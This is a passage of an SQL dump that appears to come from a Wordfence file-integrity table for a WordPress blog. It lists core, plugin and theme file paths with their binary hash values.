('0���E\00���X�H','wp-includes/js/colorpicker.min.js','/var/www/html/ictbank/blog/wp-includes/js/colorpicker.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�/����kF���x�q�','T@\"$:���� G�LB�}2P��HR��� �','',0,'?'),
('0���m&��\"�5� µT','wp-content/plugins/wordpress-seo/src/context/meta-tags-context.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/src/context/meta-tags-context.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����[0�,�J','�gq$�!X���AILB�}{�}�͑3','',0,'?'),
('0�dۦZP�2��o�','wp-content/plugins/wordfence/lib/menu_firewall_waf_options.php','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/lib/menu_firewall_waf_options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xM�g��_�zv�7�I','�]�/�r��^Q@떱w#���4!������','',0,'?'),
('0�O�q�0��\\YQ�N','wp-content/plugins/elementor/core/common/modules/event-tracker/module.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor/core/common/modules/event-tracker/module.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��a���Uळ�ݭ?�','?��I�������~�{�OL5�lo3Ŀp��','',0,'?'),
('0��$X8F�nŃk���','wp-includes/js/dist/vendor/wp-polyfill-dom-rect.min.js','/var/www/html/ictbank/blog/wp-includes/js/dist/vendor/wp-polyfill-dom-rect.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��f�UEM��X`�G�','�E\'Px%���,�4��4;k60+�K���.Q]','',0,'?'),
('1��,��U��B�[�\0�','wp-content/plugins/elementor-pro/modules/forms/submissions/personal-data.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/modules/forms/submissions/personal-data.php',0,'���1�Zx��W�\0�~','���1�Zx��W�\0�~','�DZ8w5ym^�p$�F�]b��5�]�73�W�]','',0,'?'),
('1Y����N�}c~��&','wp-content/plugins/elementor/core/editor/editor.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor/core/editor/editor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#W��s> �D=�g��c','N���L����U� X>�Y�s)��l^Y','',0,'?'),
('1E�Ϻ�SF�TúE��','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/psr7/src/UploadedFile.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/psr7/src/UploadedFile.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U����{ᔎV>p�&','��&�b������+�W(�0��(.Iӳ�٢ܹ','',0,'?'),
('1+@�� �q���G�۶','wp-content/plugins/elementor/assets/css/modules/notes/editor.min.css','/var/www/html/ictbank/blog/wp-content/plugins/elementor/assets/css/modules/notes/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�۔���GDP��5�r��','p�oz�}X\n�%�?`��|�����~�u���އ�','',0,'?'),
('1-�����g97���','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/error_polyfill.php','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/error_polyfill.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#fG�\rւ��Bg 0','��c�(����k1�����2�Qw4��?0','',0,'?'),
('1<5�-=�ۅ����','wp-content/plugins/elementor/assets/js/packages/ui/ui.js.LICENSE.txt','/var/www/html/ictbank/blog/wp-content/plugins/elementor/assets/js/packages/ui/ui.js.LICENSE.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�X�EI_�-z>���Q','3�P�݃ˤز _ID�:,3�f��c�O��0u','',0,'?'),
('1?o�x��<�?���6','wp-content/plugins/wordfence/views/blocking/option-bypass-redirect.php','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/views/blocking/option-bypass-redirect.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?v@�Y�a�p�v���','p���ZʇO�F�M��4�V92�QP��\0����','',0,'?'),
('1l+>Fxr����}','wp-content/plugins/elementor-pro/assets/js/woocommerce-my-account.6509f179e93231fa2b6a.bundle.js','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/assets/js/woocommerce-my-account.6509f179e93231fa2b6a.bundle.js',0,'F��/�÷��g\Z\0@���','F��/�÷��g\Z\0@���','���Xu������4�0�_6���9�Vu�k<xV','',0,'?'),
('1s�)6�Ӷ���C��Η','wp-admin/user/admin.php','/var/www/html/ictbank/blog/wp-admin/user/admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�T^�1�����A�|','Y��%մ9����N��?\\v\\a��M���~','',0,'?'),
('1|v�<��-V��A]�','wp-content/plugins/wordpress-seo/src/exceptions/addon-installation/addon-installation-error-exception.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/src/exceptions/addon-installation/addon-installation-error-exception.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n�(�8�K��� �','\\���&�:*�I����0�)�z։�֜��W�','',0,'?'),
('1~��]\'5j��','wp-content/plugins/elementor/assets/images/app/site-editor/products.svg','/var/www/html/ictbank/blog/wp-content/plugins/elementor/assets/images/app/site-editor/products.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U��\'���P_\\���','\n�4P�b���̨Y�Ms�W�}!�5�5RK�A','',0,'?'),
('1��(s=���{��','wp-content/plugins/elementor-pro/modules/assets-manager/asset-types/icons/templates.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/modules/assets-manager/asset-types/icons/templates.php',0,'���z+��\r�/�IC�7','���z+��\r�/�IC�7',']<qe�C��n�b�f[r������QJ!���\Z','',0,'?'),
('1��/ `�s���;=\Z','wp-content/plugins/wordpress-seo/src/repositories/indexable-repository.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/src/repositories/indexable-repository.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n\\����\\�,�Uw�&>','1\Z,�#�x�Z���=�-�\"�ۓ�앿O�/ �','',0,'?'),
('1��<���?E�(�','wp-content/plugins/elementor/assets/css/modules/notes/editor.css','/var/www/html/ictbank/blog/wp-content/plugins/elementor/assets/css/modules/notes/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��N���/�aZ��_�','J�l/�]�u�^N�r\0\Z��9�A�гq�b��1','',0,'?'),
('1���pa�`H0ߢ�e','wp-includes/js/dist/url.js','/var/www/html/ictbank/blog/wp-includes/js/dist/url.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V�6��۾�Ίy','�J�4�QJ&��\\���:ȥ����1�;v','',0,'?'),
('1�W͎�XD=-���','wp-content/plugins/wordpress-seo/src/generators/schema/howto.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/src/generators/schema/howto.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��w��Mڻ��8*l �','\"��v�������?��/!�f�:����','',0,'?'),
('1�Ůx]a\'vq�/�9�','wp-content/plugins/elementor/assets/lib/share-link/share-link.js','/var/www/html/ictbank/blog/wp-content/plugins/elementor/assets/lib/share-link/share-link.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�`�?jbB��F�Z���','�9R�� [����a�n*�b�#����','',0,'?'),
('1БY���4I^p�','wp-includes/sodium_compat/LICENSE','/var/www/html/ictbank/blog/wp-includes/sodium_compat/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0?��4\'+̶�L)$�','�Y ORٴ@�M������=���x�M�K�\Z.','',0,'?'),
('1�EfQ�v#)�\n�0EkQ','wp-admin/images/media-button-image.gif','/var/www/html/ictbank/blog/wp-admin/images/media-button-image.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���m� \'���A','i�z[����/\"� X���{�o��:��','',0,'?'),
('1�2~�Y�J��','wp-content/plugins/elementor/assets/js/new-template.js','/var/www/html/ictbank/blog/wp-content/plugins/elementor/assets/js/new-template.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}bߕF^�P��~�/�','pբ��S�eHkb �bH���,v�c�|c','',0,'?'),
('1���XR��5_u�,q','wp-content/plugins/elementor/assets/images/go-pro.svg','/var/www/html/ictbank/blog/wp-content/plugins/elementor/assets/images/go-pro.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&\\�x�fx��l�L��','�ﰼ�m�����qO�¸y��xy(�n���','',0,'?'),
('1�`��!�ߧA5�6','wp-content/plugins/elementor/data/v2/base/exceptions/wp-error-exception.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor/data/v2/base/exceptions/wp-error-exception.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X�O����͚�','g��ӷ�RFF�.��0L�o�7nP�ƪ����1w','',0,'?'),
('1��X�/�t60^Ҁ!�7','wp-includes/js/comment-reply.min.js','/var/www/html/ictbank/blog/wp-includes/js/comment-reply.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I/,\Z~��B�|�\Z�','C�Y3M�lO2��|��T!�Q$�=�@ӧ�O$TD','',0,'?'),
('1��Op���F�x\r�','wp-content/plugins/elementor/assets/js/fa0cbd4c7b6a8ad83224.bundle.js','/var/www/html/ictbank/blog/wp-content/plugins/elementor/assets/js/fa0cbd4c7b6a8ad83224.bundle.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�F��s��hĿJ�B','�m+��B��.�t��(���=Ź!P��R\\�ϯs','',0,'?'),
('2Z�v��p$x�@V�','wp-content/plugins/wordpress-seo/inc/sitemaps/class-sitemaps-cache.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/inc/sitemaps/class-sitemaps-cache.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k�����s&�=�L�','����2re�#��x��h\0>�����˯^h�6','',0,'?'),
('2J�y*�m����]W','wp-includes/js/dist/a11y.js','/var/www/html/ictbank/blog/wp-includes/js/dist/a11y.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&uH1YO8:c����','�sҲ��1��v��2\'OLQ�<�c@^','',0,'?'),
('2b�U��\0��s�pd0�','wp-includes/js/clipboard.min.js','/var/www/html/ictbank/blog/wp-includes/js/clipboard.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�s�����djI~�i�T�','Q����]qF����ضU��J�\"���\r�/^0','',0,'?'),
('2&1G\\^�t�-�<��','wp-content/plugins/elementor/assets/js/announcements-app.js','/var/www/html/ictbank/blog/wp-content/plugins/elementor/assets/js/announcements-app.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\���J۫����!d','�A���ք��D��a��X���N\0��Ӓ�','',0,'?'),
('29X�M��)e�S�6ک','wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/scripts/shBrushPerl.js','/var/www/html/ictbank/blog/wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/scripts/shBrushPerl.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I#?��q:3�a��]','W)�\nN��\Z�XBg�kPm�\Z�(��{�ܩ�]','',0,'?'),
('2@�j�j\0�kӲ��Ә','wp-admin/includes/template.php','/var/www/html/ictbank/blog/wp-admin/includes/template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*�j�֦��We��^','�%�kDS� Ƶ�A�1��vs��e�^a���5�','',0,'?'),
('2D��%�J����?��\Z','wp-includes/js/dist/wordcount.js','/var/www/html/ictbank/blog/wp-includes/js/dist/wordcount.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\Zd��1�`6����r','5i�gKy�� ���uD��,�3t��)P�','',0,'?'),
('2Y� ��oq&�Z���','wp-includes/class-wp-block.php','/var/www/html/ictbank/blog/wp-includes/class-wp-block.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'B������@5� ���','�Kb~���~���.��O�K���LIN�l[���','',0,'?'),
('2f~���v��X�3�L','wp-includes/blocks/post-comments-form/style.css','/var/www/html/ictbank/blog/wp-includes/blocks/post-comments-form/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1�k�$�r[K�i�B��','�=VPf�7������xSK���q��d��)��O','',0,'?'),
('2gl�bC�d�M`H��','wp-includes/css/dist/block-library/reset.css','/var/www/html/ictbank/blog/wp-includes/css/dist/block-library/reset.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$X�yR�I��S���','���2�bm�qV�ɻ,5��\n��e�3rÐ','',0,'?'),
('2j�L,���W\r��W$��','wp-admin/css/colors/sunrise/colors-rtl.min.css','/var/www/html/ictbank/blog/wp-admin/css/colors/sunrise/colors-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�2�2n�$��Qi>','G��V]�Ί����hex͑���ʍ�:�_l','',0,'?'),
('2r}�V�ĥ$^���n/','wp-content/plugins/wordfence/css/images/ui-icons_777777_256x240.png','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/css/images/ui-icons_777777_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h�^n=(��&��݂�N&','S��DIB�z�_-?(Y��pE�y�ƹA�','',0,'?'),
('2}���C����\ZǏ','wp-content/themes/twentytwentyfour/patterns/gallery-offset-images-grid-2-col.php','/var/www/html/ictbank/blog/wp-content/themes/twentytwentyfour/patterns/gallery-offset-images-grid-2-col.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d��;���bʬi�\'?�\"','�k�����e(8G��cf.�A}2�/�e�ï��','',0,'?'),
('2���!C|�R4�ض�J','wp-includes/blocks/paragraph/style.min.css','/var/www/html/ictbank/blog/wp-includes/blocks/paragraph/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ڠ�.6��](�r��','��\r��4���ޠ��&�_�x![�x~��','',0,'?'),
('2��DM���6\Z��B','wp-content/plugins/wordpress-seo/vendor_prefixed/psr/http-factory/src/UriFactoryInterface.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/vendor_prefixed/psr/http-factory/src/UriFactoryInterface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�,�8#U�9=�ӡ\Z','j\n�b�2F�Da�{�_L+.�K2�k�\r2','',0,'?'),
('2��%B�̾��Uq e0','wp-content/plugins/elementor-pro/modules/pricing/widgets/price-list.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/modules/pricing/widgets/price-list.php',0,'�!�A8����͚�Vl','�!�A8����͚�Vl','��:+hŐ�j������){�14���)�� m�','',0,'?'),
('2�/���IC�j���','wp-content/themes/hello-elementor/template-parts/404.php','/var/www/html/ictbank/blog/wp-content/themes/hello-elementor/template-parts/404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|�\Z��s�E$��&�','���a]����2C�� ;��^��i\ry�@','',0,'?'),
('2�|�(ủt��T��','wp-admin/privacy-policy-guide.php','/var/www/html/ictbank/blog/wp-admin/privacy-policy-guide.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P�O1�]8\n�6�','�eM��E��9�*b6��8}I�^�Z���z�','',0,'?'),
('2��㺨a|F�l3]�','wp-includes/customize/class-wp-customize-new-menu-section.php','/var/www/html/ictbank/blog/wp-includes/customize/class-wp-customize-new-menu-section.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� �sL2/�B�����','H\'�s�ӽ����I�$��Ӧ�ͤ�X�!�','',0,'?'),
('2�v��\'��9\r��z','wp-content/plugins/wordfence/css/images/ui-icons_555555_256x240.png','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/css/images/ui-icons_555555_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p��bD�@p�G+��','*DZ�>�Bg�&Y�Y������4(<�/','',0,'?'),
('2ģ��_�D�x���','wp-content/plugins/wordfence/views/common/block-navigation-option.php','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/views/common/block-navigation-option.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O�����~�}t.�K','M�N��������F`\r9���ӫ�rP�,Q','',0,'?'),
('2��Qv���Le�,���','wp-content/plugins/elementor/assets/js/wp-audio.75f0ced143febb8cd31a.bundle.min.js','/var/www/html/ictbank/blog/wp-content/plugins/elementor/assets/js/wp-audio.75f0ced143febb8cd31a.bundle.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��@N!@�����?\n0[','|�Gz_�R ����d���n{&?\n�','',0,'?'),
('2�\Z�8�F*Q*a��+','wp-content/uploads/2020/02/cropped-ictbank2-300x300.png','/var/www/html/ictbank/blog/wp-content/uploads/2020/02/cropped-ictbank2-300x300.png',0,'�X�az�V�>�H�L','�X�az�V�>�H�L','us�aDL�(_t3)4��_ZD���o�Wm��Mq�','',0,'?'),
('2��Zs��+z��','wp-includes/css/dist/block-directory/style-rtl.min.css','/var/www/html/ictbank/blog/wp-includes/css/dist/block-directory/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� �M�FS�g@�ߝ�','��`1d\'�Fq/r)�c�6��N���]���l','',0,'?'),
('2�0mK�:r²\\0\nB�','wp-content/plugins/wordfence/views/options/option-toggled-boolean-switch.php','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/views/options/option-toggled-boolean-switch.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x���9/��Z�h�6�\n','�J<<���x?�#�o������Jn8�:j��','',0,'?'),
('2��^(��ʭ�-^x��','wp-includes/SimplePie/Enclosure.php','/var/www/html/ictbank/blog/wp-includes/SimplePie/Enclosure.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R����\'�G�ko�','Z:�\r�}n�Z��`�tj�!L�l� {���bg�','',0,'?'),
('2��?�b-�x�)���','wp-content/themes/twentytwentyfour/assets/images/windows.webp','/var/www/html/ictbank/blog/wp-content/themes/twentytwentyfour/assets/images/windows.webp',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���NaPM��`��(�\r','�vjy;�`9�#���Zy��T�����Jn��d','',0,'?'),
('3\Z�-Ғ���,j�','wp-includes/blocks/comment-date.php','/var/www/html/ictbank/blog/wp-includes/blocks/comment-date.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F�0���qm-�=/\'�','�7��.#⋳w�b!?������@�r��6�','',0,'?'),
('3@��<���J�u�I�','wp-content/plugins/elementor-pro/modules/theme-builder/widgets/site-title.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/modules/theme-builder/widgets/site-title.php',0,'X{�S]A&��w,�cW�','X{�S]A&��w,�cW�','v�{2`�ԕ�����\'�W��Ǎ��ar���e���','',0,'?'),
('3+z��.���6Q~]y[','wp-includes/js/tinymce/plugins/wptextpattern/plugin.min.js','/var/www/html/ictbank/blog/wp-includes/js/tinymce/plugins/wptextpattern/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`�*�j���r� �',',a�)�\"��T}������vh�[7Z�o~��m��','',0,'?'),
('3M������b�Bp','wp-content/plugins/elementor/assets/css/modules/ai/layout-preview.css','/var/www/html/ictbank/blog/wp-content/plugins/elementor/assets/css/modules/ai/layout-preview.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','߂B�*��nK�W�{��','j6q��[RO�zj,�p�� �I��3g_�v�%U','',0,'?'),
('3cj%�>u�!E��\n','wp-content/plugins/elementor-pro/assets/css/widget-search-rtl.min.css','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/assets/css/widget-search-rtl.min.css',0,'��#�\rC� �ӡػ�?','��#�\rC� �ӡػ�?','�����c(�7)��3/9�~��F�� m��F5��','',0,'?'),
('3d�Ϋ�jK�<u��c!w','wp-content/plugins/wordpress-seo/src/helpers/schema/article-helper.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/src/helpers/schema/article-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0�\r���F\\oʝ�\nv','��Mf�}D�}Tg��{�$y6ª�\n�w�\\��b�+','',0,'?'),
('3h���\"I+[��E','wp-includes/js/clipboard.js','/var/www/html/ictbank/blog/wp-includes/js/clipboard.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����\r8ܞRO@��','3>0����D�2!J�w@��Ly����','',0,'?'),
('3k��oW�5 k[mq','wp-admin/includes/continents-cities.php','/var/www/html/ictbank/blog/wp-admin/includes/continents-cities.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����^�z\r�r����','��������,�`ĭ$��7��܁��{n','',0,'?'),
('3p���\\�8�lD�q','wp-includes/sodium_compat/namespaced/Core/Util.php','/var/www/html/ictbank/blog/wp-includes/sodium_compat/namespaced/Core/Util.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';��*�kLwB��d�=','ec[d�M?H�|�KY�\04��@� QA��:FF �','',0,'?'),
('3sKU�\"���H<s','wp-content/plugins/elementor/assets/lib/perfect-scrollbar/js/perfect-scrollbar.js','/var/www/html/ictbank/blog/wp-content/plugins/elementor/assets/lib/perfect-scrollbar/js/perfect-scrollbar.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���7���90q�D�','��C��?� ���ʍ*���Qcߪ2��\0�1�0','',0,'?'),
('3x��!���','wp-content/plugins/elementor/assets/js/packages/store/store.min.js.LICENSE.txt','/var/www/html/ictbank/blog/wp-content/plugins/elementor/assets/js/packages/store/store.min.js.LICENSE.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;rB�(k����s','Ԗ%���*��,i۞0!�j�L�.�Y� �+�','',0,'?'),
('3z\'�O��v�J&�� ','wp-includes/rest-api/endpoints/class-wp-rest-posts-controller.php','/var/www/html/ictbank/blog/wp-includes/rest-api/endpoints/class-wp-rest-posts-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��)\'G&��&���','��?~�#��2���%ൖ=�M�\"\0)!�R�','',0,'?'),
('3��P�S�\0ڏ��{U3=','wp-content/plugins/elementor-pro/modules/forms/actions/discord.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/modules/forms/actions/discord.php',0,'�0ǐk�!`m��$o�','�0ǐk�!`m��$o�','�ϝ���j\r��нt���a�(I#Z�<\Zn','',0,'?'),
('3���\09��Z�A���.','wp-content/plugins/wordpress-seo/js/dist/languages/he.js','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/js/dist/languages/he.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�v�EJ�$֞}��2�','S��\'�������A�j�·P�9�z�~G','',0,'?'),
('3�=�\n�8�8��Os','wp-content/plugins/elementor/assets/data/responsive-widgets.json','/var/www/html/ictbank/blog/wp-content/plugins/elementor/assets/data/responsive-widgets.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��!���b����',']cN�U�)?}K�4�i��@G��\Z��(y��','',0,'?'),
('3��\Z��J�a6��T�c','wp-content/plugins/elementor-pro/assets/js/archive-posts.d30c917134774f65dd6d.bundle.min.js','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/assets/js/archive-posts.d30c917134774f65dd6d.bundle.min.js',0,'�3)\r��>��r�?�','�3)\r��>��r�?�','�9�0��ʳ93�\Z�=S���G�p���\Z\\�','',0,'?'),
('3�s���-1���!','wp-content/plugins/wordpress-seo/vendor_prefixed/league/oauth2-client/src/Tool/QueryBuilderTrait.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/vendor_prefixed/league/oauth2-client/src/Tool/QueryBuilderTrait.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z��d����?��G�W','E�c�#�[$�=U���<��Zn�q��z� �','',0,'?'),
('3����G�1\Z�%��\\','wp-content/themes/hello-elementor/readme.txt','/var/www/html/ictbank/blog/wp-content/themes/hello-elementor/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�C$E�1�\0�����S','��c�DP��P��nO\r�M�FG�aYe�:�1�u�N�','',0,'?'),
('3��J%k������?�','wp-content/plugins/wordpress-seo/admin/views/tabs/network/features.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/admin/views/tabs/network/features.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g�-%/^�˕7Ic�f','�}o��w�0�>�j���!�3�}�1�C�','',0,'?'),
('3��v< t`�C9Ɵ�','wp-content/plugins/elementor/includes/controls/date-time.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor/includes/controls/date-time.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Q(��ʠ�l%f�','�ξ�5b�\ZW��S���z>2y�+5M=Rr}H','',0,'?'),
('3��@�]Ɍ<M�*','wp-includes/html-api/class-wp-html-processor.php','/var/www/html/ictbank/blog/wp-includes/html-api/class-wp-html-processor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ȝw�ſ�JxS4Z�','6��\0X1�]C֢,ϑ \n���e�','',0,'?'),
('3�l���V9Np�','wp-content/plugins/wordpress-seo/license.txt','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/license.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��~�S}L�~#vv5�+,','-j�H�p�3Ů՚%<O�.�4L��:�v�&c�','',0,'?'),
('3��:�Wt��/ ','wp-content/plugins/elementor/assets/js/app-loader.min.js','/var/www/html/ictbank/blog/wp-content/plugins/elementor/assets/js/app-loader.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j�� �8��2�K�]���','c?��l���ƃR+/r�F�A�ۨ�b�7F�Ҧ�','',0,'?'),
('3���\'���RK�Bf�','wp-includes/js/tinymce/plugins/wpdialogs/plugin.min.js','/var/www/html/ictbank/blog/wp-includes/js/tinymce/plugins/wpdialogs/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','QO1�/<�>%\"�X��','�6�r�*�IY\0�C�9<��Jږ J*�xD','',0,'?'),
('3��fQ3�h�5[��W�<','wp-includes/Text/Diff/Renderer.php','/var/www/html/ictbank/blog/wp-includes/Text/Diff/Renderer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w.���֨\"�&�R�<','���[�9�#�c��2��z����\\�\'?��H1','',0,'?'),
('3����ڬЌ���\"�','wp-content/themes/twentytwentyfour/parts/sidebar.html','/var/www/html/ictbank/blog/wp-content/themes/twentytwentyfour/parts/sidebar.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S�\Zs/�,+���Ɵ�V','\r���j�� \ni\0N��v�b�O��Ȫ����','',0,'?'),
('3���औO�5(�','wp-includes/theme.json','/var/www/html/ictbank/blog/wp-includes/theme.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0B��Z]M��sܗ�','eN�<�@\'�Y���0�\n �\Z�d.ou�\'�U','',0,'?'),
('3��ng\0��\\\0 �W','wp-includes/IXR/class-IXR-value.php','/var/www/html/ictbank/blog/wp-includes/IXR/class-IXR-value.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��f�>�5l�j\0f�','�?h����͇ X��UP�O|H$�1���','',0,'?'),
('4�$,�Gu������','wp-content/plugins/wordpress-seo/css/dist/first-time-configuration-2320.css','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/css/dist/first-time-configuration-2320.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Y4���o�O,Gh','T���ܘ�: �ed!��0�=�6��#1Ff','',0,'?'),
('4\n�� m�]Ŀ�Њ��','wp-content/plugins/wordfence/views/scanner/issue-easyPassword.php','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/views/scanner/issue-easyPassword.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!��{\\� d����`�','���ǿ\'�ɜ�LҪ�B>��� &-�{���','',0,'?'),
('4\n��2�ߵ\"E��GÉ','wp-content/plugins/wordfence/lib/wfIpLocator.php','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/lib/wfIpLocator.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\rr���x�B�{��&&�','O�oM��U-���؟\Z��rs������O�}��@','',0,'?'),
('4���ڮRt(��','wp-content/plugins/wordfence/modules/login-security/classes/utility/multisiteconfigurationextractor.php','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/modules/login-security/classes/utility/multisiteconfigurationextractor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�2��\'�]@]e�k+��',' ���a��)s�©�Ck#�7��f���\Z�','',0,'?'),
('4l�)��f��^��','wp-content/uploads/woocommerce-placeholder-100x100.png','/var/www/html/ictbank/blog/wp-content/uploads/woocommerce-placeholder-100x100.png',0,'_�g#�N:�:�OBcW�','_�g#�N:�:�OBcW�','��{1q�k+��ɥ�t�ي�[��ŧ����','',0,'?'),
